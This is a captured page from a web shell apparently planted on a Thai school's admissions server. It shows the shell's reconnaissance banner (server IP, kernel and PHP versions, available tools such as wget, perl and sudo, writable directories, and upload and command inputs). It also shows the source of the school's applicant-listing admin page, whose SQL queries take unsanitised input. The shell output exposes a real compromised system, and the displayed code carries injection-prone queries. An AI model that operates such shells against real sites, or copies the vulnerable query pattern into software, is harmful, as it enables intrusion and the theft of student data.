403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/admissions3/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/admissions3/home44.php
<?

require_once "connectdb.php";
?>
<html>
<head>
<title>-:- ADMIN -:-</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="style.css" rel="stylesheet" type="text/css">
</head>

<body bgcolor="#FFFFFF"  onLoad="javascript:document.getElementById('useradmin').focus();">
<table width="50%" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr> 
    <td bgcolor="#003399">
<div align="center"><font color="#FFFFFF" size="+1"><strong>ʶԵÔÃѺÊÁѤà Á.4 <font color="#FFFF00">âçàÃÕ¹¡Ñ¹·ÃÅÑ¡ÉìÇÔ·ÂÒ</font></strong></font></div></td>
  </tr>
  <tr> 
    <td bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="1" cellpadding="1">
        
        
              </table>

</li>
<br>
<br>
<br>
<br>
<br>
<li><img src="images/supject.jpeg" width="20" height="20" >&nbsp;<a href="regis4p.php"  target="_blank"><font size='+2'>ÊÁѤÃà¢éÒàÃÕ¹ ªÑé¹Á. 4/ (੾ÒФÇÒÁÊÒÁÒö¾ÔàÈÉ)</font></a></li>
<li><img src="../klw/imagemain/supject.jpeg" width="20" height="20" >&nbsp;<a href="regis4.php"  target="_blank"><font size='+2'>ÊÁѤÃà¢éÒàÃÕ¹ ªÑé¹Á. 4/âçàÃÕ¹·ÑèÇä»</font></a> </li>
<li><img src="../klw/imagemain/supject.jpeg" width="20" height="20" >&nbsp;<a href="login5"  target="_blank"><font size='+2'>ÊÁѤÃà¢éÒàÃÕ¹ ªÑé¹Á. 4/ (੾ÒÐ ¡.Å.Ç. »Õ¡ÒÃÈÖ¡ÉÒ 2560)</font></a></li>
<li><img src="../klw/imagemain/supject.jpeg" width="20" height="20" >&nbsp;<a href="login4"  target="_blank"><font size='+2'>¾ÔÁ¾ìãºÊÁѤÃ/ºÑµÃ Á.4 </font></a> &nbsp;</li>


  
<tr> 

              <table width="100%" border="0" align="center" cellpadding="1" cellspacing="1">
                <tr> 
                  <td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
                      <tr class="jobscss"> 
                        <td bgcolor="#FFFFFF"> <table width="100%" border="0" cellspacing="0" cellpadding="0">
                            <tr> 
                              <td bgcolor="#000000"><table width="100%" border="0" cellspacing="1" cellpadding="1">
                                  <tr bgcolor="#006666"> 
                                    <td width="44" height="24"> <div align="center"><font color="#FFFFFF" size="2">#</font></div></td>
                                   
                                    <td width="200"><div align="center"><font color="#FFFFFF" size="2">»ÃÐàÀ··Õèà»Ô´ÃѺÊÁѤÃ</font></div></td>
                                    <td width="120"><div align="center"><font color="#FFFFFF" size="2"> Çѹ·Õè 24 
									ª/­ &nbsp;&nbsp;&nbsp;¹Í¡à¢µ/ã¹à¢µ</font></div></td>
                                    <td width="120"> <div align="center"><font color="#FFFFFF" size="2">Çѹ·Õè 25 ª/­ &nbsp;&nbsp;&nbsp;¹Í¡à¢µ/ã¹à¢µ</font></div></td>
									 <td width="120"> <div align="center"><font color="#FFFFFF" size="2">Çѹ·Õè 26 ª/­ &nbsp;&nbsp;&nbsp;¹Í¡à¢µ/ã¹à¢µ</font></div></td>

									  
									  <td width="120"> <div align="center"><font color="#FFFFFF" size="2">Çѹ·Õè 27 ª/­ &nbsp;&nbsp;&nbsp;¹Í¡à¢µ/ã¹à¢µ</font></div></td>

									 <td width="50"> <div align="center"><font color="#FFFFFF" size="2">ÃÇÁ</font></div></td>

									
									 
                                  </tr>
                                </table></td>
                            </tr>
                          </table>






                          <?
$page = $_GET['page'];
$num = 1;
$select_type="select * from member4  order by id asc";
$query_select=mysql_query($select_type);
$num_rows=mysql_num_rows($query_select);

if($num_rows<1){
echo "<br><br><center><font color=#666666 face=tahoma size=2>ÂѧäÁèÁÕ¡ÒÃà¾ÔèÁ¢éÍÁÙŤèÐ</font></center>";
}else{
		$select="select * from member4  order by id asc";
		$q_ry = mysql_query($select);
	 	$num_rows=mysql_num_rows($q_ry);
  		$pagesize=45;
		$rt=$num_rows%$pagesize;
		if($rt!=0)
			{
				$totalpage=floor($num_rows/$pagesize)+1;
			}
		else
			{
				$totalpage=floor($num_rows/$pagesize);
				$toppic_id=1;
			}
		if(empty($page))
			{
				$page=1;
			}
		mysql_free_result($q_ry);
		$goto=($page-1)*$pagesize;
$sql_select_mem="Select * From tpyad4 order by idtpy asc limit $goto,$pagesize";
		$fect=mysql_query($sql_select_mem);
		if(!$fect)
		{
		("µÔ´µèͰҹ¢éÍÁÙÅäÁèä´é".mysql_error());
		exit;
		}

	  $bgcount=0;
	while($rows=mysql_fetch_array($fect))
	{
$idmember =$rows['idtpy'];
$idstudent  =$rows['idtpy_id'];
$name =$rows['idtpy_name'];
$surname  =$rows['surname'];
$sex  =$rows['sex'];
$pin  =$rows['pin'];
$room  =$rows['room'];
$idtest =$rows['idtest'];

	?>

              
                          <table width="100%" border="0" cellspacing="0" cellpadding="0">
                            <tr> 
                              <td bgcolor="#000000"><table width="100%" border="0" cellspacing="1" cellpadding="1">
                                  <tr bgcolor="#FFFFFF"> 
                                    <td width="44" height="24"> <div align="center"><font color="#990000" size="2"><? echo "$num"; ?></font></div></td>
                                    <td width="200"> <font color="#003366" size="2"><a href=search41.php  target="_blank"><? echo "$name"; ?></a></font><br> 
                                      <div align="left"></div></td>
                                    <td width="120"><font color="#003366" size="2"><? echo "$idtest"; ?></font>
<?

	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  sex=1 and signup=25 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num25x=$dcrd[0];

	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  sex=2 and signup=25 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num25y=$dcrd[0];


	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  statuss=1 and signup=25 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num25out=$dcrd[0];


	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  statuss=2 and signup=25 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num25in=$dcrd[0];

//////////////


?>                   

<? echo "$num25x"; ?>/<? echo "$num25y"; ?>&nbsp;&nbsp;&nbsp;<? echo "$num25out"; ?>/<? echo "$num25in"; ?></td>
               
<td width="120"><font color="#003366" size="2">
									
									
									<?

	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  sex=1 and signup=26 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num26x=$dcrd[0];

	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  sex=2 and signup=26 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num26y=$dcrd[0];


	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  statuss=1 and signup=26 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num26out=$dcrd[0];


	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  statuss=2 and signup=26 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num26in=$dcrd[0];
//////////////


?>                   

<? echo "$num26x"; ?>/<? echo "$num26y"; ?>&nbsp;&nbsp;&nbsp;<? echo "$num26out"; ?>/<? echo "$num26in"; ?></td>
									
									
									</font></td>
                                    <td width="120"><div align="center">
									
	<?

	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  sex=1 and signup=27 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num27x=$dcrd[0];

	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  sex=2 and signup=27 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num27y=$dcrd[0];



	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent'";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$numtotal=$dcrd[0];


	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  statuss=1 and signup=27 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num27out=$dcrd[0];


	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  statuss=2 and signup=27 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num27in=$dcrd[0];

//////////////


?>                   

<? echo "$num27x"; ?>/<? echo "$num27y"; ?>&nbsp;&nbsp;&nbsp;<? echo "$num27out"; ?>/<? echo "$num27in"; ?></td>								
									
									
									
									
									</td>
									 <td width="120"><div align="center">
									 
									 
				<?

	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  sex=1 and signup=28 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num28x=$dcrd[0];

	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  sex=2 and signup=28 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num28y=$dcrd[0];

//////////////

$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  statuss=1 and signup=28 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num28out=$dcrd[0];


	$crsql="SELECT count(idstudent) FROM member4   where idstudent='$idstudent' and  statuss=2 and signup=28 ";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$num28in=$dcrd[0];

?>                   

<? echo "$num28x"; ?>/<? echo "$num28y"; ?>&nbsp;&nbsp;&nbsp;<? echo "$num28out"; ?>/<? echo "$num28in"; ?></td>					 
									 
									 
									 
									 </td>
									  <td width="50"><div align="center"><? echo "$numtotal"; ?></td>
                                  </tr>
                                </table></td>
                            </tr>
                          </table>
                          <?
$num = $num+1;
}
echo "<div align=center><br>
                    <font color=#999999 size=2><span class=cc> ";
	for($i=1;$i<$page;$i++)
	{
	echo"<a href='$PHP_SELF?page=$i'><font size=2 color='#000000' class=textborder>$i</font></a> ";
	}
	echo"<font size=2 color=#000000><b><font size=2 color='#FF00000' class=textborderok>$page</font></b></font> ";
	for($i=$page+1;$i<=$totalpage;$i++)
	{
	echo"<a href='$PHP_SELF?page=$i'><font size=2 color='#000000' class=textborder>$i</font></a> ";
	}
echo "</span></font> </div>";
}
?>
                        </td>
                      </tr>
                      <tr class="jobscss"> 
                        <td height="19">&nbsp;</td>
                      </tr>
                      <tr> 
                        <td><div align="center"></div></td>
                      </tr>
                    </table></td>
                </tr>
              </table>
            </div></td>
        </tr>
        <tr>
          <td>&nbsp;</td>
        </tr>
      </table></td>
  </tr>



<br>
<br>
</center>
</body>
<center><font size='3' color="blue">½èÒºÃÔËÒçҹÇÔªÒ¡ÒÃâçàÃÕ¹¡Ñ¹·ÃÅÑ¡ÉìÇÔ·ÂÒ</font></center>
<center><font color="red"></font>tel 045-661420 http://gpa.klws.ac.th</center>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit